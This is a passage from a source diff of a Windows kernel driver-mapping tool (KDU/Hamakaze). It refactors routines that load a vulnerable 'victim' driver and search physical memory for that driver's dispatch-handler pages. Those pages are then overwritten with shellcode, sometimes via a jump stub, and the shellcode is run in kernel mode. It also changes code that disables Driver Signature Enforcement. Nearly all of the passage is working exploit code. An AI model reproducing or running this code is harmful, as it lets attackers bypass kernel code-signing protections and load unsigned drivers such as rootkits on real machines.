+ BOOL bIoResult;
+ PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- KDU_PROVIDER* prov = Context->Provider;
+ provReadPhysicalMemory ReadPhysicalMemory = Params->ReadPhysicalMemory;
+ provWritePhysicalMemory WritePhysicalMemory = Params->WritePhysicalMemory;
- //
- // If provider does not support translation return TRUE.
- //
- if ((PVOID)prov->Callbacks.VirtualToPhysical == NULL)
- return TRUE;
+ ULONG_PTR targetAddress = 0;
- dataSize = ScSizeOf(Context->ShellVersion, NULL);
+ PVOID dispatchSignature = Params->DispatchSignature;
+ ULONG signatureSize = Params->DispatchSignatureLength;
+ ULONG dispatchPageOffset = Params->DispatchHandlerPageOffset;
- memPage = (TargetAddress & 0xfffffffffffff000ull);
+ BYTE buffer[PAGE_SIZE];
+ RtlSecureZeroMemory(&buffer, sizeof(buffer));
- if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle,
- memPage,
- &physAddrStart))
+ if (ReadPhysicalMemory(Params->DeviceHandle,
+ Address,
+ &buffer,
+ PAGE_SIZE))
{
- memPage = (TargetAddress + dataSize) & 0xfffffffffffff000ull;
-
- if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle,
- memPage,
- &physAddrEnd))
+ if (signatureSize == RtlCompareMemory(dispatchSignature,
+ RtlOffsetToPointer(buffer, dispatchPageOffset),
+ signatureSize))
{
- ULONG_PTR diffAddr = physAddrEnd - physAddrStart;
+ printf_s("\t-> Found page with code at address 0x%llX\r\n", Address);
+ Params->ccPagesFound += 1;
- if (diffAddr > PAGE_SIZE)
- return FALSE;
- else
- return TRUE;
- }
+ if ((SIZE_T)dispatchPageOffset + (SIZE_T)Params->cbPayload > PAGE_SIZE) {
+
+ unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 };
+
+ *(PULONG)&jmpcode[1] = Params->JmpAddress;
+
+ printf_s("\t--> Setting jump[%lX][%lX] at address 0x%llX\r\n",
+ jmpcode[0],
+ *(PULONG)&jmpcode[1],
+ Address + dispatchPageOffset);
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ Address + dispatchPageOffset,
+ jmpcode,
+ sizeof(jmpcode));
+
+ if (bIoResult) {
+
+ printf_s("\t--> Memory has been modified at address 0x%llX\r\n", Address + dispatchPageOffset);
+ printf_s("\t--> Overwriting page at address 0x%llX\r\n", Address);
+
+ targetAddress = Address;
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ targetAddress,
+ Params->pvPayload,
+ Params->cbPayload);
+
+ }
+
+ }
+ else {
+
+ targetAddress = Address + dispatchPageOffset;
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ targetAddress,
+ Params->pvPayload,
+ Params->cbPayload);
+
+ }
+
+ if (bIoResult) {
+ Params->ccPagesModified += 1;
+ printf_s("\t--> Memory has been modified at address 0x%llX\r\n", targetAddress);
+ }
+ else {
+ supPrintfEvent(kduEventError,
+ "Could not modify memory at address 0x%llX\r\n", targetAddress);
+ }
+ }
}
+
return FALSE;
}
/*
-* KDUMapDriver
+* KDUDriverMapInit
*
* Purpose:
*
-* Run mapper.
+* Allocate shellcode structure and create sync event.
*
*/
-BOOL KDUMapDriver(
+BOOL KDUDriverMapInit(
_In_ PKDU_CONTEXT Context,
- _In_ PVOID ImageBase)
+ _In_ PVOID ImageBase,
+ _Out_ PVOID* ShellCode,
+ _Out_ PHANDLE SectionHandle,
+ _Out_ PHANDLE SyncEventHandle
+)
{
- BOOL bSuccess = FALSE;
- ULONG_PTR objectAddress, targetAddress = 0;
- FILE_OBJECT fileObject;
- DEVICE_OBJECT deviceObject;
- DRIVER_OBJECT driverObject;
-
PVOID pvShellCode;
+ HANDLE sectionHandle = NULL, readyEventHandle;
- KDU_PROVIDER* prov;
- KDU_VICTIM_PROVIDER* victimProv;
-
- ULONG retryCount = 1, maxRetry = 3;
-
- HANDLE victimDeviceHandle = NULL;
-
- FUNCTION_ENTER_MSG(__FUNCTION__);
-
- prov = Context->Provider;
- victimProv = Context->Victim;
-
-Reload:
+ *ShellCode = NULL;
+ *SectionHandle = NULL;
+ *SyncEventHandle = NULL;
- if (victimProv->SupportReload == FALSE) {
- printf_s("[+] Victim does not supports reload, max retry count set to 1\r\n");
- maxRetry = 1;
- }
+ pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
+ if (pvShellCode == NULL) {
- printf_s("[+] Victim \"%ws\" %lu acquire attempt of %lu (max)\r\n", victimProv->Name, retryCount, maxRetry);
+ supPrintfEvent(kduEventError,
+ "[!] Error while building shellcode, abort\r\n");
- //
- // If this is reload, release victim.
- //
- if (victimDeviceHandle) {
- VpRelease(victimProv, &victimDeviceHandle);
+ return FALSE;
}
- if (VpCreate(victimProv,
- Context->ModuleBase,
- &victimDeviceHandle))
- {
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
- }
- else {
+ readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
+ if (readyEventHandle == NULL) {
supPrintfEvent(kduEventError,
- "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError());
-
- }
+ "[!] Error building the ready event handle, abort\r\n");
- if (supQueryObjectFromHandle(victimDeviceHandle, &objectAddress)) {
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
- do {
-
- RtlSecureZeroMemory(&fileObject, sizeof(fileObject));
+ return FALSE;
+ }
- printf_s("[+] Reading FILE_OBJECT at 0x%llX\r\n", objectAddress);
+ *ShellCode = pvShellCode;
+ *SectionHandle = sectionHandle;
+ *SyncEventHandle = readyEventHandle;
- if (!KDUReadKernelVM(Context,
- objectAddress,
- &fileObject,
- sizeof(FILE_OBJECT)))
- {
+ return TRUE;
+}
- supPrintfEvent(kduEventError,
- "[!] Could not read FILE_OBJECT at 0x%llX\r\n", objectAddress);
+/*
+* KDUpMapDriverPhysicalSection
+*
+* Purpose:
+*
+* Process shellcode write through physical memory section.
+*
+*/
+BOOL KDUpMapDriverPhysicalSection(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ PVICTIM_IMAGE_INFORMATION VictimImageInformation,
+ _In_ ULONG_PTR TargetAddress
+)
+{
+ BOOL bSuccess = FALSE;
+ HANDLE deviceHandle = Context->DeviceHandle;
+ HANDLE victimDeviceHandle = NULL;
+ KDU_PROVIDER* prov = Context->Provider;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
- break;
- }
+ ULONG dispatchPageOffset = VictimImageInformation->DispatchPageOffset;
+ ULONG_PTR memPage, targetAddress = TargetAddress;
- printf_s("[+] Reading DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+ provWriteKernelVM WriteKernelVM = prov->Callbacks.WriteKernelVM;
- RtlSecureZeroMemory(&deviceObject, sizeof(deviceObject));
+ do {
- if (!KDUReadKernelVM(Context,
- (ULONG_PTR)fileObject.DeviceObject,
- &deviceObject,
- sizeof(DEVICE_OBJECT)))
- {
+ if ((SIZE_T)dispatchPageOffset + (SIZE_T)ScSize > PAGE_SIZE) {
- supPrintfEvent(kduEventError,
- "[!] Could not read DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+ memPage = (TargetAddress & 0xfffffffffffff000ull);
+ printf_s("[~] Shellcode overlaps page boundary, switching target memory address to 0x%llX\r\n", memPage);
- break;
- }
+ unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 };
- printf_s("[+] Reading DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+ *(PULONG)&jmpcode[1] = VictimImageInformation->JumpValue;
- RtlSecureZeroMemory(&driverObject, sizeof(driverObject));
+ printf_s("\t>> Setting jump[%lX][%lX] at address 0x%llX\r\n",
+ jmpcode[0],
+ *(PULONG)&jmpcode[1],
+ TargetAddress);
- if (!KDUReadKernelVM(Context,
- (ULONG_PTR)deviceObject.DriverObject,
- &driverObject,
- sizeof(DRIVER_OBJECT)))
- {
+ if (!WriteKernelVM(deviceHandle, TargetAddress, &jmpcode, sizeof(jmpcode))) {
supPrintfEvent(kduEventError,
- "[!] Could not read DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+ "[!] Error writting kernel memory, abort\r\n");
break;
+
}
+ else {
- //
- // Victim handle no longer needed, can be closed.
- //
- NtClose(victimDeviceHandle);
- victimDeviceHandle = NULL;
+ targetAddress = TargetAddress - dispatchPageOffset;
- targetAddress = (ULONG_PTR)driverObject.MajorFunction[IRP_MJ_DEVICE_CONTROL];
+ }
- if (!KDUCheckMemoryLayout(Context, targetAddress)) {
+ }
- supPrintfEvent(kduEventError,
- "[!] Physical address is not within same/next page, reload victim driver\r\n");
+ //
+ // Write shellcode to kernel.
+ //
+ printf_s("[+] Writing shellcode at 0x%llX address with size 0x%lX\r\n", targetAddress, ScSize);
- retryCount += 1;
- if (retryCount > maxRetry) {
+ if (!WriteKernelVM(deviceHandle, targetAddress, ScBuffer, ScSize)) {
- supPrintfEvent(kduEventError,
- "[!] Too many attempts, abort\r\n");
+ supPrintfEvent(kduEventError,
+ "[!] Error writting kernel memory, abort\r\n");
+ break;
+ }
- break;
- }
- goto Reload;
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
- }
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
- printf_s("[+] Victim IRP_MJ_DEVICE_CONTROL 0x%llX\r\n", targetAddress);
- printf_s("[+] Victim DriverUnload 0x%p\r\n", driverObject.DriverUnload);
+ supPrintfEvent(kduEventError,
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
+ }
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
+ }
- } while (FALSE);
-
- }
+ } while (FALSE);
//
// Ensure victim handle is closed.
@@ -666,293 +711,343 @@ BOOL KDUMapDriver(
victimDeviceHandle = NULL;
}
- if (bSuccess) {
-
- HANDLE sectionHandle = NULL;
-
- pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
-
- if (pvShellCode) {
-
- HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
- if (readyEventHandle) {
-
- //
- // Write shellcode to driver.
- //
- if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
- targetAddress,
- pvShellCode,
- ScSizeOf(Context->ShellVersion, NULL)))
- {
-
- supPrintfEvent(kduEventError,
- "[!] Error writing shellcode to the target driver, abort\r\n");
-
- bSuccess = FALSE;
- }
- else {
-
- printf_s("[+] Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n");
-
- //
- // Run shellcode.
- //
- printf_s("[+] Run shellcode\r\n");
- VpExecutePayload(victimProv, &victimDeviceHandle);
-
- //
- // Wait for the shellcode to trigger the event
- //
- if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) {
-
- supPrintfEvent(kduEventError,
- "[!] Shellcode did not trigger the event within two seconds.\r\n");
-
- bSuccess = FALSE;
- }
- else
- {
- KDUShowPayloadResult(Context, sectionHandle);
- }
- }
+ return bSuccess;
+}
- CloseHandle(readyEventHandle);
+/*
+* KDUpMapDriverPhysicalBruteForce
+*
+* Purpose:
+*
+* Process shellcode write through physical memory bruteforce.
+*
+*/
+BOOL KDUpMapDriverPhysicalBruteForce(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ PKDU_PHYSMEM_ENUM_PARAMS EnumParams
+)
+{
+ BOOL bSuccess = FALSE;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
+ HANDLE victimDeviceHandle = NULL;
- } //readyEventHandle
- else {
+ EnumParams->bWrite = TRUE;
+ EnumParams->ccPagesFound = 0;
+ EnumParams->ccPagesModified = 0;
+ EnumParams->pvPayload = ScBuffer;
+ EnumParams->cbPayload = ScSize;
- supPrintfEvent(kduEventError,
- "[!] Error building the ready event handle, abort\r\n");
+ supPrintfEvent(kduEventInformation,
+ "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
- bSuccess = FALSE;
- }
+ if (supEnumeratePhysicalMemory(KDUPagePatchCallback, EnumParams)) {
- if (sectionHandle) {
- NtClose(sectionHandle);
- }
+ printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
+ EnumParams->ccPagesFound,
+ EnumParams->ccPagesModified);
- } //pvShellCode
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
- else {
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
supPrintfEvent(kduEventError,
- "[!] Error while building shellcode, abort\r\n");
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
- bSuccess = FALSE;
+ }
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
+ bSuccess = TRUE;
}
- } //bSuccess
+ }
else {
-
supPrintfEvent(kduEventError,
- "[!] Error preloading victim driver, abort\r\n");
+ "[!] Failed to enumerate physical memory.\r\n");
- bSuccess = FALSE;
}
//
- // Cleanup.
+ // Ensure victim handle is closed.
//
- if (VpRelease(victimProv, &victimDeviceHandle)) {
- printf_s("[+] Victim released\r\n");
+ if (victimDeviceHandle) {
+ NtClose(victimDeviceHandle);
+ victimDeviceHandle = NULL;
}
- FUNCTION_LEAVE_MSG(__FUNCTION__);
-
return bSuccess;
}
/*
-* KDUProcExpPagePatchCallback
+* KDUpMapDriverDirectVM
*
* Purpose:
*
-* Patch ProcExp dispatch pages in physical memory.
+* Process shellcode write through direct virtual memory write primitive.
*
*/
-BOOL WINAPI KDUProcExpPagePatchCallback(
- _In_ ULONG_PTR Address,
- _In_ PVOID UserContext)
+BOOL KDUpMapDriverDirectVM(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ ULONG_PTR TargetAddress
+)
{
- PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- PKDU_CONTEXT Context = Params->Context;
+ BOOL bSuccess = FALSE;
+ KDU_PROVIDER* prov = Context->Provider;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
+ HANDLE victimDeviceHandle = NULL;
- provReadPhysicalMemory ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
- provWritePhysicalMemory WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
+ //
+ // Write shellcode to driver.
+ //
+ if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
+ TargetAddress,
+ ScBuffer,
+ ScSize))
+ {
- ULONG signatureSize = sizeof(ProcExpSignature);
+ supPrintfEvent(kduEventError,
+ "[!] Error writing shellcode to the target driver, abort\r\n");
- BYTE buffer[PAGE_SIZE];
- RtlSecureZeroMemory(&buffer, sizeof(buffer));
+ }
+ else {
- if (ReadPhysicalMemory(Context->DeviceHandle,
- Address,
- &buffer,
- PAGE_SIZE))
- {
- if (signatureSize == RtlCompareMemory(ProcExpSignature,
- RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET),
- signatureSize))
- {
- printf_s("\tFound page with code at address 0x%llX\r\n", Address);
- Params->ccPagesFound += 1;
+ printf_s("[+] Driver handler code modified\r\n");
- if (WritePhysicalMemory(Context->DeviceHandle,
- Address + PE152_DISPATCH_PAGE_OFFSET,
- Params->pvPayload,
- Params->cbPayload))
- {
- Params->ccPagesModified += 1;
- printf_s("\tMemory has been modified at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET);
- }
- else {
- supPrintfEvent(kduEventError,
- "Could not modify memory at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET);
- }
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
+
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
}
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
+ bSuccess = TRUE;
+ }
}
- return FALSE;
+ //
+ // Ensure victim handle is closed.
+ //
+ if (victimDeviceHandle) {
+ NtClose(victimDeviceHandle);
+ victimDeviceHandle = NULL;
+ }
+
+ return bSuccess;
}
/*
-* KDUMapDriver2
+* KDUMapDriver
*
* Purpose:
*
-* Run mapper, using physical memory mapping.
+* Run mapper.
*
*/
-BOOL KDUMapDriver2(
+BOOL KDUMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase)
{
BOOL bSuccess = FALSE;
- KDU_PROVIDER* prov;
+ ULONG_PTR targetAddress = 0;
+ PVOID pvShellCode = NULL;
+
KDU_VICTIM_PROVIDER* victimProv;
- HANDLE victimDeviceHandle = NULL;
- PVOID pvShellCode;
+ VICTIM_IMAGE_INFORMATION vi;
+ VICTIM_DRIVER_INFORMATION vdi;
KDU_PHYSMEM_ENUM_PARAMS enumParams;
+ VICTIM_LOAD_PARAMETERS viLoadParams;
+
+ ULONG dispatchOffset = 0;
FUNCTION_ENTER_MSG(__FUNCTION__);
- prov = Context->Provider;
victimProv = Context->Victim;
- //
- // Load/open victim.
- //
- if (VpCreate(victimProv,
- Context->ModuleBase,
- &victimDeviceHandle))
- {
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
- }
- else {
-
- supPrintfEvent(kduEventError,
- "[!] Error preloading victim driver, abort\r\n");
-
- return FALSE;
- }
+ do {
- HANDLE sectionHandle = NULL;
+ viLoadParams.Provider = victimProv;
- pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
+ //
+ // Load victim driver.
+ //
+ if (VpCreate(victimProv,
+ Context->ModuleBase,
+ NULL,
+ VpLoadDriverCallback,
+ &viLoadParams))
+ {
+ printf_s("[+] Successfully loaded victim driver\r\n");
+ }
+ else {
- if (pvShellCode) {
+ supPrintfEvent(kduEventError,
+ "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError());
- HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
- if (readyEventHandle) {
+ break;
- enumParams.bWrite = TRUE;
- enumParams.ccPagesFound = 0;
- enumParams.ccPagesModified = 0;
- enumParams.Context = Context;
- enumParams.pvPayload = pvShellCode;
- enumParams.cbPayload = ScSizeOf(Context->ShellVersion, NULL);
+ }
- supPrintfEvent(kduEventInformation,
- "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
+ //
+ // Query all required victim information.
+ //
+ RtlSecureZeroMemory(&vi, sizeof(vi));
- if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) {
+ printf_s("[+] Query victim image information\r\n");
- printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
- enumParams.ccPagesFound,
- enumParams.ccPagesModified);
+ if (VpQueryInformation(
+ Context->Victim,
+ VictimImageInformation,
+ &vi,
+ sizeof(vi)))
+ {
+ dispatchOffset = vi.DispatchOffset;
- //
- // Run shellcode.
- //
- printf_s("[+] Run shellcode\r\n");
- VpExecutePayload(victimProv, &victimDeviceHandle);
+ RtlSecureZeroMemory(&vdi, sizeof(vdi));
- //
- // Wait for the shellcode to trigger the event
- //
- if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) {
+ printf_s("[+] Query victim loaded driver layout\r\n");
- supPrintfEvent(kduEventError,
- "[!] Shellcode did not trigger the event within two seconds.\r\n");
+ if (VpQueryInformation(
+ Context->Victim,
+ VictimDriverInformation,
+ &vdi,
+ sizeof(vdi)))
+ {
- bSuccess = FALSE;
- }
- else
- {
- KDUShowPayloadResult(Context, sectionHandle);
- }
+ targetAddress = vdi.LoadedImageBase + dispatchOffset;
}
else {
+
supPrintfEvent(kduEventError,
- "[!] Failed to enumerate physical memory.\r\n");
+ "[!] Could not query victim driver layout, GetLastError %lu\r\n", GetLastError());
- bSuccess = FALSE;
+ break;
}
- CloseHandle(readyEventHandle);
-
- } //readyEventHandle
- else {
-
+ }
+ else
+ {
supPrintfEvent(kduEventError,
- "[!] Error building the ready event handle, abort\r\n");
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
- bSuccess = FALSE;
+ break;
}
- if (sectionHandle) {
- NtClose(sectionHandle);
+ printf_s("[+] Victim target address 0x%llX\r\n", targetAddress);
+
+ HANDLE sectionHandle = NULL, readyEventHandle = NULL;
+
+ //
+ // Prepare shellcode, signal event and shared section.
+ //
+ if (!KDUDriverMapInit(Context,
+ ImageBase,
+ &pvShellCode,
+ §ionHandle,
+ &readyEventHandle))
+ {
+ break;
}
- } //pvShellCode
+ ULONG cbShellCode = ScSizeOf(Context->ShellVersion, NULL);
- else {
+ //
+ // Select proper handling depending on exploitable driver type.
+ //
+ if (Context->Provider->LoadData->PhysMemoryBruteForce) {
- supPrintfEvent(kduEventError,
- "[!] Error while building shellcode, abort\r\n");
+ //
+ // 1. Physical memory mapping via MmMapIoSpace(Ex)
+ //
+ RtlSecureZeroMemory(&enumParams, sizeof(enumParams));
- bSuccess = FALSE;
- }
+ enumParams.DeviceHandle = Context->DeviceHandle;
+ enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
- //
- // Ensure victim handle is closed.
- //
- if (victimDeviceHandle) {
- NtClose(victimDeviceHandle);
- victimDeviceHandle = NULL;
- }
+ enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
+
+ enumParams.DispatchHandlerOffset = vi.DispatchOffset;
+ enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ enumParams.JmpAddress = vi.JumpValue;
+
+ bSuccess = KDUpMapDriverPhysicalBruteForce(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ &enumParams);
+ }
+ else
+ if (Context->Provider->LoadData->PML4FromLowStub || Context->Provider->LoadData->PreferPhysical) {
+ //
+ // 2. Physical section access type driver with virt2phys translation available.
+ //
+ bSuccess = KDUpMapDriverPhysicalSection(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ &vi,
+ targetAddress);
+
+ }
+ else {
+ //
+ // 3. Direct VM write primitive available.
+ //
+ bSuccess = KDUpMapDriverDirectVM(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ targetAddress);
+
+ }
+
+ if (readyEventHandle) CloseHandle(readyEventHandle);
+ if (sectionHandle) NtClose(sectionHandle);
+
+ } while (FALSE);
//
// Cleanup.
//
- if (VpRelease(victimProv, &victimDeviceHandle)) {
+ if (VpRelease(victimProv, NULL)) {
printf_s("[+] Victim released\r\n");
}
+ if (pvShellCode)
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
+
FUNCTION_LEAVE_MSG(__FUNCTION__);
return bSuccess;
diff --git a/Source/Hamakaze/drvmap.h b/Source/Hamakaze/drvmap.h
index 4263525..030f827 100644
--- a/Source/Hamakaze/drvmap.h
+++ b/Source/Hamakaze/drvmap.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: DRVMAP.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Prototypes and definitions for driver mapping.
*
@@ -23,10 +23,6 @@ PVOID KDUSetupShellCode(
_In_ PVOID ImageBase,
_Out_ PHANDLE SectionHandle);
-BOOL WINAPI KDUProcExpPagePatchCallback(
- _In_ ULONG_PTR Address,
- _In_ PVOID UserContext);
-
VOID KDUShowPayloadResult(
_In_ PKDU_CONTEXT Context,
_In_ HANDLE SectionHandle);
@@ -35,6 +31,6 @@ BOOL KDUMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase);
-BOOL KDUMapDriver2(
- _In_ PKDU_CONTEXT Context,
- _In_ PVOID ImageBase);
+BOOL WINAPI KDUPagePatchCallback(
+ _In_ ULONG_PTR Address,
+ _In_ PVOID UserContext);
diff --git a/Source/Hamakaze/dsefix.cpp b/Source/Hamakaze/dsefix.cpp
index c486031..e099288 100644
--- a/Source/Hamakaze/dsefix.cpp
+++ b/Source/Hamakaze/dsefix.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2022
+* (C) COPYRIGHT AUTHORS, 2014 - 2023
*
* TITLE: DSEFIX.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* CI DSE corruption related routines.
* Based on DSEFix v1.3
@@ -439,6 +439,7 @@ BOOL KDUControlDSE2(
HANDLE victimDeviceHandle = NULL;
KDU_PHYSMEM_ENUM_PARAMS enumParams;
+ VICTIM_IMAGE_INFORMATION vi;
prov = Context->Provider;
victimProv = Context->Victim;
@@ -462,7 +463,9 @@ BOOL KDUControlDSE2(
//
if (VpCreate(victimProv,
Context->ModuleBase,
- &victimDeviceHandle))
+ &victimDeviceHandle,
+ NULL,
+ NULL))
{
printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
}
@@ -478,29 +481,51 @@ BOOL KDUControlDSE2(
(PVOID)Address,
DSEValue);
- enumParams.bWrite = TRUE;
- enumParams.ccPagesFound = 0;
- enumParams.ccPagesModified = 0;
- enumParams.Context = Context;
- enumParams.pvPayload = shellBuffer;
- enumParams.cbPayload = (ULONG)shellSize;
+ RtlSecureZeroMemory(&vi, sizeof(vi));
- supPrintfEvent(kduEventInformation,
- "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
+ if (!VpQueryInformation(
+ Context->Victim, VictimImageInformation, &vi, sizeof(vi)))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
+
+ }
+ else {
- if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) {
+ enumParams.DispatchHandlerOffset = vi.DispatchOffset;
+ enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ enumParams.JmpAddress = vi.JumpValue;
+ enumParams.DeviceHandle = Context->DeviceHandle;
+ enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
- printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
- enumParams.ccPagesFound,
- enumParams.ccPagesModified);
+ enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
- //
- // Run shellcode.
- //
- VpExecutePayload(victimProv, &victimDeviceHandle);
+ enumParams.bWrite = TRUE;
+ enumParams.ccPagesFound = 0;
+ enumParams.ccPagesModified = 0;
+ enumParams.pvPayload = shellBuffer;
+ enumParams.cbPayload = (ULONG)shellSize;
supPrintfEvent(kduEventInformation,
- "[+] DSE patch executed successfully\r\n");
+ "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
+
+ if (supEnumeratePhysicalMemory(KDUPagePatchCallback, &enumParams)) {
+
+ printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
+ enumParams.ccPagesFound,
+ enumParams.ccPagesModified);
+
+ //
+ // Run shellcode.
+ //
+ VpExecutePayload(victimProv, &victimDeviceHandle);
+
+ supPrintfEvent(kduEventInformation,
+ "[+] DSE patch executed successfully\r\n");
+ }
+
}
//
diff --git a/Source/Hamakaze/idrv/asrdrv.cpp b/Source/Hamakaze/idrv/asrdrv.cpp
index 0750119..8c17a99 100644
--- a/Source/Hamakaze/idrv/asrdrv.cpp
+++ b/Source/Hamakaze/idrv/asrdrv.cpp
@@ -133,7 +133,7 @@ BOOL AsrEncryptDriverRequest(
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);
- if (bResult && cbResult) {
+ if (bResult && cbResult && pbCipherData) {
ULONG outSize = sizeof(ASRDRV_REQUEST) +
cbResult +
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
index eb88912..30f71ab 100644
--- a/Source/Hamakaze/idrv/dbk.cpp
+++ b/Source/Hamakaze/idrv/dbk.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: DBK.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Cheat Engine's DBK driver routines.
*
@@ -668,6 +668,9 @@ BOOL DbkMapDriver(
bSuccess = FALSE;
}
+ if (pvShellCode)
